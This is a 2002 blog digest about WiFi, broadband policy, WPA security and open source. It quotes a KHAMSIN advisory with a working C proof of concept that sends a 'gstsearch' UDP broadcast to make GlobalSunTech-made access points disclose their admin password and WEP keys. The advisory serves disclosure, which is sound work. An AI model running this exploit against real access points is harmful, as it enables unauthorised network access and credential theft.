A juicy collection of links at The Unofficial 802.11 Security Web Page Warning, this is heavy duty stuff and probably way too much for the causal observer. [from: JB Wifi]

I don't like statements about the Internet that appear to state facts because they are always generalizations and frequently just plain wrong. But this is quite a good one The Internet exists to improve communication. Communities can grow anywhere communication occurs. From an excellent article O'Reilly Network: Building Online Communities [Oct. 21, 2002] [from: JB Ecademy]

NTL to provide Virgin with broadband : NTL Business has secured a seven-figure deal to supply Virgin.net with wholesale broadband services. The company will provide Virgin.net with a complete virtual ISP, comprising broadband access, hosting, email, call centre support, billing and collection. The deal follows a six-year relationship between the two companies relating to the provision of narrowband services. Virgin.net last month launched its broadband service, retailing at under £25-a-month.

Question: Why isn't NTL required to open up it's distribution points to third parties to allow them to supply broadband over the same final mile cable? One rule for BT, one rule for everyone else?

However, notwithstanding the cynicism inherent in that last comment, it's good to see NTL getting into the broadband wholesale business even at the risk of competing with itself. [from: JB Ecademy]

The Halloween documents are alleged to be yearly Microsoft Internal memos on open source. Allegedly, they have fallen into the hands of the open source community and not surprisingly they then end up on a website. Open Source Initiative OSI - Doc7:Halloween Documents You should draw your own conclusions and obviously take the commentary on the documents with large pinches of salt. Unsurprisingly, both the commentary and the documents involved were written with strong and opposing viewpoints. [from: JB Ecademy]

Some comment on WPA Security.

---

--31 October 2002 WPA is New Wireless Standard The Wireless Fidelity Alliance has released a new standard called Wi-Fi Protected Access (WPA). The standard will replace the easily broken security presently used by many wireless networks. WPA employs dynamic key encryption in the form of the Temporal Key Integrity Protocol (TKIP); WPA also provides improved network user authentication.
http://www.usatoday.com/tech/news/computersecurity/2002-10-31-wireless-security_x.htm
http://www.pcworld.com/news/article/0,aid,106530,00.asp
http://www.computerworld.com/securitytopics/security/story/0,10801,75533,00.html
http://news.com.com/2100-1033-964046.html

[Editor's Note (Shpantzer) Who will go to the trouble of implementing this temporary 'solution' only to replace it when 802.11i comes out? Ted Ipsen, from the Information Risk Management practice at KPMG LLP, says users should skip the WPA purchase altogether. Cisco put TKIP and its own proprietary implementation of EAP (Cisco LEAP) into their hardware about a year ago, and it's still only a stopgap measure. Layer 2 security should still be considered to be broken, even after WEP2 comes out next year. Ted always ask clients: "Do you rely on your CAT5 cable and your Ethernet switches to provide you with confidentiality, integrity and availability?" Use Layers 3 through 7 and architecture to defend your resources. (Ranum): How long will TKIP last? This is basically a layer of re-keying atop a broken cryptosystem. You can't build a castle on foundations of used chewing gum!]

---

So what this means in real terms is that you should use VPNs, SSL, POP3 and SMTP with SSL, strong authentication and encrypt communications that you consider require secrecy and you should do this all as a matter of course. This is of course good practice anyway whenever you involve internet communication. A siide effect of doing this everywhere is that it reduces the reliance on the firewall to keep out intruders and implicitly recognises that there are security leaks everywhere.

It's also a damning comment on whoever it was that called WEP "Wired Equivalent Privacy". This was just never going to be possible. [from: JB Wifi]

Megabeam rolls out Euro WLAN network : Megabeam, the pan-European wireless Internet service provider, has set the pricing for its WLAN hotspot service for the first time. Subscriptions bought directly will start at %u20AC7.5 for two hours' access. Twenty-four hour access will cost %u20AC 30 (approx. £19). As you can see from the pricing, Megabeam is targeting the business traveller only.

How sad. Another company targeting the business traveller with perceived deep pockets in order to fleece the early adopters and thereby pay for the capital costs. I know this makes business sense but where is the cheap skate WISP that charges little or nothing? Surprise! They're only a short walk to the next block. [from: JB Wifi]

Wired News has a story about the guy who mapped WiFi for the whole of Manhatten (previously blogged here) N.Y., N.Y., It's a Wireless Town [from: JB Wifi]

Dan Gillmor: Telecom strategy is take it or leave it Gillmor is talking about the USA, but his conclusions are applicable to Europe as well. He reasons that the solution to the price, slow rollout and monopoly control of broadband is first legislation to encourage public and private alternatives for the last mile problem and second to encourage Open Spectrum policies for Wireless. The second is particularly interesting. The success of WiFi is showing that particularly at high frequencies we can have an ordered exploitation of wireless spectrum without regulatory control over the allocation to providers and users. Technology is proving that spectrum doesn't have to be a scarce resource that must be carefully husbanded and so sold to the highest bidder. But I'm still not sure that it's an answer to Broadband provision at least in the short term. We don't yet have any good examples of WISPs (Wireless ISPs) being profitable or even reasonably successful. And all the current models still have high capital startup costs.

So to go back to the first point about public and private last mile investment. I find it ironic that the government of the day that first encouraged cable in te UK tried long and hard to get the cable companies to lay star-wired fibre. Sadly, this was too early in the Moore's law cycle and so prohibitively expensive at that time. But at least they did lay pipes in the road that would let them lay new wires relatively easily. Maybe we should be encouraging the cable companies to go back and offer a very high speed service as an alternative but with their current debt situation I can't see this happening. [from: JB Wifi]

Something truly wonderful about this story.

Who will buy my personal data? Josh's friend Chris got hold of his marketing data under the Data Protection Act. Now he's selling it to the highest bidder on e-bay.

Lloyds TSB: Approximately 500 pages of personal data including an analysis of banking products they believe I might be interested in. Also includes overdraft limit maintenance history (hand written), risk management history data (93 pages) and a full list of letters sent over the previous 5 years (completed by hand). All data and codes come with explanatory notes provided by Lloyds TSB. Original cost UKP 10. Sainsbury's: Dated 12 July 2001, this data is split into five separate reports. Report 1. Operational report (name and address etc.) Report 2. Operational report again, with summarised details and the last 31 transactions on the card. Report 3. Drawn from the main data repository and includes the 'Acorn' standard marketing categorisation. Includes the assumption that we are 'better-off inner-city executives living in a partially gentrified multi-ethnic area'. Report 4. Shows the transactions made using our reward card. Report 5. This is a list of EVERYTHING we bought from Sainsbury's over a 3 year period - where we bought it and how much we paid. This data has been co-produced with my partner whose individual data has been removed.

[thanks, Oblomovka] [from: JB Ecademy]

Ecademy Launches WiFi Special Interest Group.

There'll be a more formal launch tonight, but the WiFi Special Interest Group is now live. This is a complete website in the style of the main Ecademy site which shares membership with the main site (and other SIGs). The focus is on WiFi and related wireless Internet access technologies such as GPRS, 3G, Bluetooth and such like.

As a member of Ecademy and like non-members you are automatically able to view the content. If you wish to post content, vote in polls and otherwise contribute you need to join the SIG. This is a one-click process. You'll see a link to Join in your menu on the left.

The SIG has been initially populated with blog and article entries from the main site that appear to be relevant. If you were the original author you may notice that these have disappeared from your blog on the main site and appeared in your blog on the WiFi site. You have automatically been given membership of the WiFi SIG.

Over the coming months we expect to launch a group of these SIGs on various topics. [from: JB Ecademy]

KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------

Title
-----
Accesspoints disclose wep keys, password and mac filter

Date
----
2002-11-01


Description:
------------

GlobalSunTech develops Wireless Access Points for OEM customers like Linksys, D-
Link and others. Capturing the traffic of a WISECOM GL2422AP-0T during the setup
phase showed a security problem.

Sending a broadcast packet to UDP port 27155 containing the string "gstsearch"
causes the accesspoint to return wep keys, mac filter and admin password. This
happens on the WLAN Side and on the LAN Side.


Systems Affected
----------------
Vulnerable, tested, OEM Version from GlobalSunTech:
WISECOM GL2422AP-0T

Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
D-Link DWL-900AP+ B1 version 2.1 and 2.2
ALLOY GL-2422AP-S
EUSSO GL2422-AP
LINKSYS WAP11-V2.2


Proof of concept:
-----------------

#include
#include
#include
#include
#include

typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;

int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);

sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd < 0)
perror("socket");

val = 1;
ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val,
sizeof(val));
if (ret < 0)
{
perror("setsockopt");
exit(1);
}

ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct
sockaddr));
if (ret < 0)
{
perror("sendto");
exit(1);
}

ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));

printf("Type : %sn",ans->type);
printf("Announced Name : %sn",ans->name);
printf("Admin Username : %sn",ans->user);
printf("Admin Password : %sn",ans->pass);

return 0;
}

Disclaimer
-----------

This advisory does not claim to be complete or to be usable for
any purpose. Especially information on the vulnerable systems may
be inaccurate or wrong. Possibly supplied exploit code is not to
be used for malicious purposes, but for educational purposes only.
This advisory is free for open distribution in unmodified form.

http://www.khamsin.ch
[from: JB Wifi]

Another security alert. Oh, the joys of embedded code.

---

Popular Linksys Router Vulnerable to Attack

A denial-of-service vulnerability in one of the most popular cable and DSL routers
allows an attacker to crash the router from a remote location.

The Linksys Group Inc.'s BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch is
vulnerable to a remote DoS attack that requires the attacker to do nothing more
than access a specific script on the router's remote management interface. The
vulnerability affects all of the routers with firmware versions earlier than
1.42.7.

http://eletters1.ziffdavis.com/cgi-bin10/flo?y=eSkd0EXgz40DUm0ry20Ac [from: JB Wifi]

Slashdot | Building A Community Wireless Network From Scratch unusually good comments from slashdot. The main article can be found here about community wireless in Bristol. More comment later. [from: JB Wifi]

Dan Gillmor: Telecom strategy is take it or leave it Gillmor is talking about the USA, but his conclusions are applicable to Europe as well. He reasons that the solution to the price, slow rollout and monopoly control of broadband is first legislation to encourage public and private alternatives for the last mile problem and second to encourage Open Spectrum policies for Wireless. The second is particularly interesting. The success of WiFi is showing that particularly at high frequencies we can have an ordered exploitation of wireless spectrum without regulatory control over the allocation to providers and users. Technology is proving that spectrum doesn't have to be a scarce resource that must be carefully husbanded and so sold to the highest bidder. But I'm still not sure that it's an answer to Broadband provision at least in the short term. We don't yet have any good examples of WISPs (Wireless ISPs) being profitable or even reasonably successful. And all the current models still have high capital startup costs.

So to go back to the first point about public and private last mile investment. I find it ironic that the government of the day that first encouraged cable in te UK tried long and hard to get the cable companies to lay star-wired fibre. Sadly, this was too early in the Moore's law cycle and so prohibitively expensive at that time. But at least they did lay pipes in the road that would let them lay new wires relatively easily. Maybe we should be encouraging the cable companies to go back and offer a very high speed service as an alternative but with their current debt situation I can't see this happening. [from: JB Ecademy]

eWEEK - Print Article : Microsoft's Fitzgerald: Web Services Over the Hump Fitzgerald argues that the base Web Services protocols are now done and that the toolkits are in place to use them, so it's time to move into an implementation stage rather than sit there arguing about the protocols and approach. Something I wholeheartedly agree with.

Then he moves on to comparing the .NET environment with the Java environment. We get this which again is probably true. "So we continue to focus on high-volume, low-cost, mass-market, ride-the-high-volume hardware. Gartner [Inc.] did a piece this year where they said 80 percent of the spending on Java application servers has been wasted—where people are just over-buying functionality that they don't need. The current environment, where budgets are tight and people are trying to do more with less, is really forcing people to rethink writing a big check for infrastructure." And at this point I begin to wonder exactly what Java is good for. It's making serious inroads into the embedded processor market such as cellphones, but in the server development market it doesn't feel like it's proved it's point. There was a recent article about a speed comparison between Sun's reference application (The petshop store) in Java and an equivalent using other databases and platforms. One piece missing was a fully open source solution using something like Perl or Python with MySQL. I can't prove it by I have this sneeking suspicion that it would have beaten the pants off all of them.

The thing I find delightfully subversive about Web Services is that the core protocols are implemented in every language you can imagine. If you want to mix .Net, Java, Weblogic, Websphere development and applications into a loosely coupled whole, you can. And if you want to bolt in systems based on Perl SOAP::Lite, Python, Apache Axis, PHP, you can do that too. And the same goes for C++, and Delphi. [from: JB Ecademy]

IM compatibility closer to reality - Tech News - CNET.com : The Internet Engineering Task Force (IETF), the group that sets the technical standards for the Internet, gave the go-ahead to the creators of open-source instant-messaging application Jabber to create a working group based on that technology. This will be known as Extensible Messaging and Presence Protocol (XMPP). So this joins the IBM-Microsoft promoted SIMPLE. The IETF approved SIMPLE as a proposed standard in September. Then we have AOL announcing that AIM and ICQ will interoperate. The fragmented IM market is coming together slowly, but there's still plenty of room for consolidation and interworking. [from: JB Ecademy]

For those of us who spent our youth listening to Dub Reggae, here's the >>INFINITE WHEEL<< Dub Selecta!

An amazing piece of scholarship pulling together a large number of independent surveys of the computer software market. Why Open Source Software / Free Software (OSS/FS)? Look at the Numbers! If you're trying to convince your boss to go with OSS/FS software, this would be a good report to wave at her. [from: JB Ecademy]

This story's actually about WPA but included are some stats from Gartner. ElectricNews.net:News:Wi-Fi Alliance toughens 802.11 security : According to research body Gartner Dataquest, worldwide wireless LAN shipments should increase by 73 percent in 2002, while revenue will increase 26 percent. Gartner predicts that by 2003, WLAN shipments will total 26.5 million units, up from 15.5 million units in 2002, while revenue will reach almost USD2.8 billion in 2003, compared to USD2.1 billion in 2002. Gartner analysts say the market will continue to experience healthy growth through to 2007.

So in very broad terms we have exponential growth in shipments, linear growth in revenue and falling profits. What seems to be happening is that falling prices due to competition is happening earlier and earlier in the price curve and before the early adopters have paid off all the capital costs with the initial high prices. This is a new form of economics isn't it?

I think I've seen some other figures that suggest that Wireless ethernet shipments are now 30% of all ethernet shipments but I can't confirm that. [from: JB Wifi]

WLAN Hot Spot Access For 3G Ericsson announces strategic partnerships to speed up market take-off for public WLAN. Ericsson chooses Agere and Proxim to jointly develop and supply telecom operators with complete end-to-end solutions for WLAN (Wi-Fi) access, integrating hot spot access with mobile 2G and 3G networks. [thanks, CYBERFROST.net]

On the surface this looks like a great idea. But for it to work, we'll need mass shipments of client hardware that supports it. Imagine a new PCMCIA card that does 802.11a+b as well as GSM and/or CDMA with identification and authentication via a standard cellphone SIM. We'd then be able to fire up the laptop and get access anywhere with the software and card choosing the highest speed available. It ought to be possible to choose an appropriate voice channel as well, VoIP if it's available, dropping back to cell if not. But like I said, to do this, we have to have a high installed base of these cards and we also have to have the same sort of roaming and cross charging arrangements that we currently have with cellphone operators. Meanwhile the WLAN industry is churning out  .11b and now .11a cards without all this. The operators won't have the same stranglehold over the technology that they enjoyed with cellphones during the 90s.   [from: JB Wifi]